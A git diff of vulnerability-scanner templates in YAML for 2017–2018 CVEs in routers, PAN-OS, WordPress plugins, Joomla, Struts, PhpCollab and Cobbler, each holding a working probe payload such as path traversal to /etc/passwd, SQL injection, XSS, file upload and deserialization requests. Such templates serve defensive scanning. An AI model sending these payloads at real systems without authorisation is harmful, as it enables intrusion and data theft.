a/poc/cve/CVE-2017-15647.yaml +++ b/poc/cve/CVE-2017-15647.yaml @@ -1,42 +1,28 @@ id: CVE-2017-15647 - info: - name: FiberHome Routers - Local File Inclusion + name: FiberHome - Directory Traversal author: daffainfo severity: high - description: FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. - remediation: | - Apply the latest firmware update provided by FiberHome to fix the LFI vulnerability. + description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. reference: - https://www.exploit-db.com/exploits/44054 + - https://www.cvedetails.com/cve/CVE-2017-15647 - https://blogs.securiteam.com/index.php/archives/3472 - - https://nvd.nist.gov/vuln/detail/CVE-2017-15647 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-15647 cwe-id: CWE-22 - epss-score: 0.02013 - epss-percentile: 0.87618 - cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: fiberhome - product: routerfiberhome_firmware - tags: lfi,router,edb,cve,cve2017 - -http: + tags: cve,cve2017,lfi,router +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth" - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 -# digest: 490a0046304402205867c7c662e0149c13acdcd4a6fac9c5f3e57d07df8d37fd86d9f9019755b77702202897437e4c4c08ca0ca39bd2f60fb5e2789ba6b48169f56df40564a649ae58d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-15944.yaml b/poc/cve/CVE-2017-15944.yaml index f69b9b9ad5..5f276b5ce9 100644 --- a/poc/cve/CVE-2017-15944.yaml +++ b/poc/cve/CVE-2017-15944.yaml @@ -1,33 +1,46 @@ id: CVE-2017-15944 + info: name: Palo Alto Network PAN-OS - Remote Code Execution author: emadshanab,milo2012 severity: critical description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface. + remediation: | + Apply the latest security patches and updates provided by Palo Alto Networks. reference: - https://www.exploit-db.com/exploits/43342 - https://security.paloaltonetworks.com/CVE-2017-15944 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - https://nvd.nist.gov/vuln/detail/CVE-2017-15944 + - http://www.securitytracker.com/id/1040007 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-15944 - tags: cve,cve2017,rce,vpn,panos,globalprotect -requests: + epss-score: 0.97344 + epss-percentile: 0.99871 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: paloaltonetworks + product: pan-os + tags: kev,edb,cve,cve2017,rce,vpn,panos,globalprotect + +http: - raw: - | GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1 Host: {{Hostname}} Cookie: PHPSESSID={{randstr}}; + matchers-condition: and matchers: - type: word part: body words: - "@start@Success@end@" + - type: status status: - 200 - -# Enhanced by mp on 2022/04/26 +# digest: 4a0a00473045022100e89db1ccfc85ce175e03a6e493147e60bd77f4c02339836e4c1a65c17800ede5022071057ee36f817d7de5ec8da10946ff99be8fccee48c3e4e8db0b1f378ad56735:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-17451.yaml b/poc/cve/CVE-2017-17451.yaml index 4bef0d1456..0ce0fc0daf 100644 --- a/poc/cve/CVE-2017-17451.yaml +++ b/poc/cve/CVE-2017-17451.yaml @@ -1,50 +1,34 @@ id: CVE-2017-17451 - info: - name: WordPress Mailster <=1.5.4 - Cross-Site Scripting + name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. - remediation: | - Update to the latest version of the WordPress Mailster plugin (>=1.5.5) which includes a fix for this vulnerability. + description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-17451 - https://wordpress.org/plugins/wp-mailster/#developers - https://packetstormsecurity.com/files/145222/WordPress-WP-Mailster-1.5.4.0-Cross-Site-Scripting.html - https://wpvulndb.com/vulnerabilities/8973 - - https://nvd.nist.gov/vuln/detail/CVE-2017-17451 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-17451 cwe-id: CWE-79 - epss-score: 0.00178 - epss-percentile: 0.54969 - cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: wpmailster - product: wp_mailster - framework: wordpress - tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm - -http: + tags: cve,cve2017,wordpress,xss,wp-plugin +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word - part: body words: - "" - + part: body - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a004730450221009ce2ec0fe2884b0fc2519c502b9652c81c4b5af8261348ce9e18b8c786b9bf1902207b5b958f973ac31839ce86a76cc228a6b3dfd0ed0a118fa240bc075f28c5a53d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-18536.yaml b/poc/cve/CVE-2017-18536.yaml index 47b3559ca4..931dee4892 100644 --- a/poc/cve/CVE-2017-18536.yaml +++ b/poc/cve/CVE-2017-18536.yaml @@ -1,49 +1,32 @@ id: CVE-2017-18536 - info: - name: WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting + name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting. - remediation: | - Update to the latest version of the WordPress Stop User Enumeration plugin (1.3.7) or apply the provided patch to fix the vulnerability. + description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. reference: - https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 - https://wordpress.org/plugins/stop-user-enumeration/#developers - - https://nvd.nist.gov/vuln/detail/CVE-2017-18536 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-18536 cwe-id: CWE-79 - epss-score: 0.00088 - epss-percentile: 0.36961 - cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: fullworks - product: stop_user_enumeration - framework: wordpress - tags: wpscan,cve,cve2017,wordpress,xss,wp-plugin - -http: + tags: cve,cve2017,wordpress,xss,wp-plugin +requests: - method: GET path: - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - "" - + part: body - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a004730450221008c88f13becf164ac21e06f7177a85f48c44c02c0960e086609230a1fa9d1db2a022004a5345b57d8cc2f1bc4823b054526e2c80ca6c89c03069511d9afbcd15c242a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-3528.yaml b/poc/cve/CVE-2017-3528.yaml index 1681ef3ca7..6b985fcdae 100644 --- a/poc/cve/CVE-2017-3528.yaml +++ b/poc/cve/CVE-2017-3528.yaml @@ -1,40 +1,28 @@ id: CVE-2017-3528 - info: name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect author: 0x_Akoko severity: medium description: 'The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.' - remediation: | - Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability. reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 - https://nvd.nist.gov/vuln/detail/CVE-2017-3528 - http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html - - http://www.securitytracker.com/id/1038299 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-3528 cwe-id: CWE-601 - epss-score: 0.00865 - epss-percentile: 0.80439 - cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: oracle - product: applications_framework - tags: oracle,redirect,edb,cve,cve2017 - -http: + tags: cve,cve2017,oracle,redirect +requests: - method: GET path: - - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh" - + - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" matchers: - type: word - part: body words: - - 'noresize src="/\interact.sh?configName=' -# digest: 4b0a004830460221008bf6cd9fdab2de27ac8173cdbe552438fff524c38a5695e4b08d93a0f7cd8900022100c6dd717f299ae64c7af43d4cec3bd3d389c98ca3ce188b670a4d93bbc179f052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 'noresize src="/\example.com?configName=' + part: body + +# Enhanced by mp on 2022/04/14 diff --git a/poc/cve/CVE-2017-5521.yaml b/poc/cve/CVE-2017-5521.yaml index 1ec3a1db53..6c4e70b523 100644 --- a/poc/cve/CVE-2017-5521.yaml +++ b/poc/cve/CVE-2017-5521.yaml @@ -6,23 +6,31 @@ info: severity: high description: | NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server. + remediation: | + Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability - - http://web.archive.org/web/20210123212905/https://www.securityfocus.com/bid/95457/ - https://nvd.nist.gov/vuln/detail/CVE-2017-5521 - - https://www.cvedetails.com/cve/CVE-2017-5521/ + - https://www.exploit-db.com/exploits/41205/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-5521 cwe-id: CWE-200 - tags: cve,cve2017,auth-bypass,netgear,router + epss-score: 0.97402 + epss-percentile: 0.99906 + cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: netgear + product: r6200_firmware + tags: cve,cve2017,auth-bypass,netgear,router,kev -requests: +http: - method: GET path: - - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei" + - "{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}" matchers-condition: and matchers: @@ -37,4 +45,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/06/19 +# digest: 490a0046304402200d97883d59665ec7e09f40a33f162e0b2e28ff8364049396cca461b1fe8cee07022052f03a0eb200bc31e62c40faa091730a01fc3093b2600357df52155a1cfa196a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2017-5631.yaml b/poc/cve/CVE-2017-5631.yaml index 39c6899af9..96858abc89 100644 --- a/poc/cve/CVE-2017-5631.yaml +++ b/poc/cve/CVE-2017-5631.yaml @@ -1,34 +1,48 @@ id: CVE-2017-5631 + info: - name: CaseAware - Cross Site Scripting + name: KMCIS CaseAware - Cross-Site Scripting author: edoardottt severity: medium - description: An issue was discovered in KMCIS CaseAware. Reflected cross site scripting is present in the user parameter (i.e., "usr") that is transmitted in the login.php query string. + description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. + remediation: | + To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5631 - https://www.openbugbounty.org/incidents/228262/ - https://www.exploit-db.com/exploits/42042/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-5631 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-5631 cwe-id: CWE-79 - tags: cve,cve2017,xss,caseaware -requests: + epss-score: 0.00286 + epss-percentile: 0.65307 + cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: kmc_information_systems + product: caseaware + tags: edb,cve,cve2017,xss,caseaware + +http: - method: GET path: - "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and matchers: - type: word part: body words: - "'>" + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a0047304502207adca921e9e9d39999c61b491c7b05e46bdfdf5e116a7950f83ceadebb2efbd9022100d6e02b13d0633c905625f2bfb46b9d5a3f770f03941ac18208c79563c7a0a1e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-6090.yaml b/poc/cve/CVE-2017-6090.yaml index 7ed49da249..38352df854 100644 --- a/poc/cve/CVE-2017-6090.yaml +++ b/poc/cve/CVE-2017-6090.yaml @@ -1,34 +1,21 @@ id: CVE-2017-6090 info: - name: PhpColl 2.5.1 Arbitrary File Upload + name: PhpCollab (unauthenticated) Arbitrary File Upload author: pikpikcu severity: high - description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php. - remediation: | - Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability. - reference: - - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/ - - https://nvd.nist.gov/vuln/detail/CVE-2017-6090 - - https://www.exploit-db.com/exploits/42934/ + tags: cve,cve2017,phpcollab,rce,fileupload + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2017-6090 cwe-id: CWE-434 - epss-score: 0.9726 - epss-percentile: 0.99812 - cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: phpcollab - product: phpcollab - shodan-query: http.title:"PhpCollab" - tags: cve2017,phpcollab,rce,fileupload,edb,cve,intrusive - -http: + description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." + +requests: - raw: - - | + - | # REQUEST 1 POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137 @@ -40,8 +27,9 @@ http: -----------------------------154934846911423734231554128137-- - - | - GET /logos_clients/{{randstr}}.php HTTP/1.1 + + - | # REQUEST 2 + GET /logos_clients/1.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and @@ -54,4 +42,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c0af277d4141b7383fb7caafc38b3dd1a971868da500b3800851c43d0fb2996902202ef9c2d271359f62e22aecb66dccc201a04aed839fff8cc3f6355e71e9782c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2017-8917.yaml b/poc/cve/CVE-2017-8917.yaml index 7bc43442b0..02c7417ed4 100644 --- a/poc/cve/CVE-2017-8917.yaml +++ b/poc/cve/CVE-2017-8917.yaml @@ -1,29 +1,45 @@ id: CVE-2017-8917 + info: name: Joomla! <3.7.1 - SQL Injection author: princechaddha severity: critical description: | - Joomla! 3.7.x before 3.7.1 contains a SQL injection vulnerability that could allow attackers to execute arbitrary SQL commands via unspecified vectors. + Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Joomla! to version 3.7.1 or later to mitigate the SQL Injection vulnerability. reference: - - https://www.cvedetails.com/cve/CVE-2017-8917/ - https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html - - http://www.securityfocus.com/bid/98515 + - https://nvd.nist.gov/vuln/detail/CVE-2017-8917 + - https://web.archive.org/web/20211207050608/http://www.securitytracker.com/id/1038522 - http://www.securitytracker.com/id/1038522 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-8917 cwe-id: CWE-89 + epss-score: 0.97555 + epss-percentile: 0.99995 + cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: joomla + product: joomla\! + shodan-query: http.component:"Joomla" tags: cve,cve2017,joomla,sqli -requests: +variables: + num: "999999999" + +http: - method: GET path: - - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)" + - "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)" + matchers: - type: word part: body words: - - "cf79ae6addba60ad018347359bd144d2" + - '{{md5(num)}}' -# Enhanced by mp on 2022/05/11 +# digest: 4a0a00473045022100adaa3221218bcfbbdfd74f148b4a127a8876f6467b6f43b0ac717cd45f00ffc6022015d114abf831c83a639225e19167c9472c0c041a7e948be8f9890603f9c27af6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2017-9805.yaml b/poc/cve/CVE-2017-9805.yaml index c60d7eebd9..c62b854a41 100644 --- a/poc/cve/CVE-2017-9805.yaml +++ b/poc/cve/CVE-2017-9805.yaml @@ -1,26 +1,38 @@ id: CVE-2017-9805 + info: name: Apache Struts2 S2-052 - Remote Code Execution author: pikpikcu severity: high description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2. reference: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + - http://www.securitytracker.com/id/1039263 + - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 - tags: cve,cve2017,apache,rce,struts -requests: + epss-score: 0.97545 + epss-percentile: 0.99994 + cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: struts + tags: cve,cve2017,apache,rce,struts,kev + +http: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" - headers: - Content-Type: application/xml + body: | @@ -79,6 +91,10 @@ requests: + + headers: + Content-Type: application/xml + matchers-condition: and matchers: - type: word @@ -86,8 +102,9 @@ requests: - "Debugging information" - "com.thoughtworks.xstream.converters.collections.MapConverter" condition: and + - type: status status: - 500 -# Enhanced by mp on 2022/04/20 +# digest: 4b0a00483046022100fffb5572ea6a3a9e66caeba001ac48de1a809db496abc1d5367643a27b64e550022100e7862b50988b1084007910376221f62bcb95de32c3bd50681d323f776c17ecd5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2017-9822.yaml b/poc/cve/CVE-2017-9822.yaml index 09de04f19d..35f81b943b 100644 --- a/poc/cve/CVE-2017-9822.yaml +++ b/poc/cve/CVE-2017-9822.yaml @@ -1,19 +1,32 @@ id: CVE-2017-9822 info: - name: DotNetNuke Cookie Deserialization Remote Code Execution (RCE) + name: DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution author: milo2012 severity: high - description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected to deserialization vulnerability that leads to Remote Code Execution (RCE) - tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization - reference: https://github.com/murataydemir/CVE-2017-9822 + description: DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution. + remediation: | + Upgrade DotNetNuke to a version higher than 9.3.0 + reference: + - https://github.com/murataydemir/CVE-2017-9822 + - https://nvd.nist.gov/vuln/detail/CVE-2017-9822 + - http://www.dnnsoftware.com/community/security/security-center + - http://packetstormsecurity.com/files/157080/DotNetNuke-Cookie-Deserialization-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 + epss-score: 0.96098 + epss-percentile: 0.99351 + cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: dnnsoftware + product: dotnetnuke + tags: packetstorm,cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev -requests: +http: - raw: - | GET /__ HTTP/1.1 @@ -25,12 +38,13 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - '[extensions]' - 'for 16-bit app support' - part: body condition: and - type: status status: - 404 +# digest: 490a00463044022028e736e04ef7b6dbf11400c0f0aa927a20e9be5eefdd8e59dd02446f884083550220153659a881d37a3d8018dd48be2f5c22db9ff2136f662c961f9dada95ad445e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-0101.yaml b/poc/cve/CVE-2018-0101.yaml index 617dcbd20c..c737a701c8 100644 --- a/poc/cve/CVE-2018-0101.yaml +++ b/poc/cve/CVE-2018-0101.yaml @@ -1,4 +1,5 @@ id: cve-2018-0101 + info: name: Cisco ASA Denial-of-Service # Leads to RCE author: dwisiswant0 @@ -9,12 +10,14 @@ info: remote attacker to cause a reload of the affected system or to remotely execute code. It was also possible that the ASA could stop processing incoming Virtual Private Network (VPN) authentication requests due to a low memory condition. tags: cve,cve2018,cisco,dos,rce + requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Accept: */* + - | POST / HTTP/1.1 Host: {{Hostname}} @@ -31,12 +34,14 @@ requests: A + req-condition: true matchers-condition: and matchers: - type: dsl dsl: - "status_code_1 == 200" + - type: dsl dsl: - "status_code_2 == 500" @@ -44,4 +49,4 @@ requests: - "status_code_2 == 502" - "status_code_2 == 503" - "status_code_2 == 504" - condition: or + condition: or \ No newline at end of file diff --git a/poc/cve/CVE-2018-1000226.yaml b/poc/cve/CVE-2018-1000226.yaml index 42c35970d8..9ebcf5d7e6 100644 --- a/poc/cve/CVE-2018-1000226.yaml +++ b/poc/cve/CVE-2018-1000226.yaml @@ -1,31 +1,19 @@ id: CVE-2018-1000226 - info: - name: Cobbler - Authentication Bypass + name: Cobbler versions 2.6.11+, (2.0.0+ or older versions) - Authentication Bypass author: c-sh0 - severity: critical - description: Cobbler versions 2.6.11+, but code inspection suggests at least 2.0.0+ and possibly even older versions, may be vulnerable to an authentication bypass vulnerability in XMLRPC API (/cobbler_api) that can result in privilege escalation, data manipulation or exfiltration, and LDAP credential harvesting. This attack appear to be exploitable via "network connectivity". Taking advantage of improper validation of security tokens in API endpoints. Please note this is a different issue than CVE-2018-10931. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Cobbler. reference: - https://github.com/cobbler/cobbler/issues/1916 - https://movermeyer.com/2018-08-02-privilege-escalation-exploits-in-cobblers-api/ - https://nvd.nist.gov/vuln/detail/CVE-2018-1000226 + severity: critical + tags: cve,cve2018,cobbler,auth-bypass classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-1000226 cwe-id: CWE-732 - epss-score: 0.01552 - epss-percentile: 0.85736 - cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cobblerd - product: cobbler - tags: cve,cve2018,cobbler,auth-bypass - -http: +requests: - raw: - | POST {{BaseURL}}/cobbler_api HTTP/1.1 @@ -34,38 +22,30 @@ http: - _CobblerXMLRPCInterface__make_token - - - - cobbler - - - + _CobblerXMLRPCInterface__make_token + + + cobbler + + - matchers-condition: and matchers: - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - + - type: status + status: + - 200 - type: word part: header words: - "Content-Type: text/xml" - - type: word part: body words: - "" - + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)" - - - type: status - status: - - 200 -# digest: 4b0a0048304602210082bc211041a4f7ff8fcf41cb56b1450d7706cc105dd6358cbfe2d6d6cb3a365c022100ad4927015824ad322d9d2c2b8d40d9852b469e51c45d5300b7313836b216f37f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-1000856.yaml b/poc/cve/CVE-2018-1000856.yaml index 836d88b898..6641b1a909 100644 --- a/poc/cve/CVE-2018-1000856.yaml +++ b/poc/cve/CVE-2018-1000856.yaml @@ -1,10 +1,13 @@ id: CVE-2018-1000856 + info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via segments/add.php Segment Name field. + DomainMOD 4.11.01 is vulnerable to cross-site scripting via the segments/add.php Segment Name field. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://github.com/domainmod/domainmod/issues/80 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000856 @@ -13,10 +16,17 @@ info: cvss-score: 4.8 cve-id: CVE-2018-1000856 cwe-id: CWE-79 + epss-score: 0.00101 + epss-percentile: 0.41274 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 3 + vendor: domainmod + product: domainmod tags: cve,cve2018,domainmod,xss,authenticated -requests: + +http: - raw: - | POST / HTTP/1.1 @@ -34,19 +44,23 @@ requests: GET /segments/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - cookie-reuse: true - redirects: true + + host-redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word part: body words: - "" + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a0047304502204ee309065e5e0306ba0a5ab03ab7afb1f0f45ee06364730726979986ad7c518a022100bd53b5ce068753efed007fb99117704f5f715e2c11173ec8a897922d1cde264e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2018-10230.yaml b/poc/cve/CVE-2018-10230.yaml index 281d1a1d81..cca03a385b 100644 --- a/poc/cve/CVE-2018-10230.yaml +++ b/poc/cve/CVE-2018-10230.yaml @@ -1,24 +1,36 @@ id: CVE-2018-10230 + info: - name: Zend Server < 9.13 - XSS + name: Zend Server <9.13 - Cross-Site Scripting author: marcos_iaf severity: medium description: | - A vulnerability in ZendServer < 9.13 allows an attacker to perform Reflected XSS via the debug_host parameter. + Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter. + remediation: | + Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability. reference: - https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf - - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 - https://www.zend.com/en/products/server/release-notes + - https://nvd.nist.gov/vuln/detail/CVE-2018-10230 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10230 cwe-id: CWE-79 + epss-score: 0.00122 + epss-percentile: 0.46323 + cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zend + product: zend_server tags: cve,cve2018,xss,zend -requests: + +http: - method: GET path: - 